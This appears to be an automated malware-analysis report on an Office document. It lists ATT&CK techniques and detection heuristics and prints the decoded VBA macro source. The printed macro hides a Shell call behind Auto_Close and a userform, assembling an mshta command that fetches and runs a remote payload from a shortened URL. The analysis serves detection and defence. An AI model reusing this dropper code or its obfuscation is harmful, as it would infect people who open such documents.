MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including an Auto_Close macro, which is a common technique for executing malicious code upon document closure. The script constructs a URL by concatenating string literals and uses the Shell function to execute it, likely downloading and running a second-stage payload. The constructed URL is http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell maviya1 -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
AUtO_ClOsE() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/djkaaahdasdhkasjasdhksdbhd Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1503 bytes |
SHA-256: 8345cb22770a79cfb36baa20e5983998d66f1c375ae793e1d67be6751191eb2d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sexy"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Sub hhhhh()
lol.Show
End Sub
Attribute VB_Name = "tutulpiii"
Function maviya1() As String
maviya2 = "m"
maviya1 = maviya2 + maviya3 + lahab
End Function
Attribute VB_Name = "hithithit"
Function maviya3()
yadeez1 = "s"
yadeez2 = "h"
yadeez3 = "t" + "a h" + "t"
maviya3 = yadeez1 + yadeez2 + yadeez3
End Function
Attribute VB_Name = "hullll"
Option Explicit
Sub _
AUtO_ClOsE()
Dim kasdok As sexy
Set kasdok = New sexy
With kasdok
End With
kasdok.hhhhh
End Sub
Attribute VB_Name = "lol"
Attribute VB_Base = "0{0912433B-95BC-45DF-8D58-BFA9C146EEFA}{C20D8037-E631-47F8-B93A-0DA16545D457}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Private Sub UserForm_Terminate()
Shell maviya1
End Sub
Attribute VB_Name = "putter"
Function lahab() As String
lahab1 = "tp://%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40%40@j.mp/"
lahab2 = "djka" + "aah" + "dasdhkasj" + "asdhksdb" + "hd"
lahab = lahab1 + lahab2
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.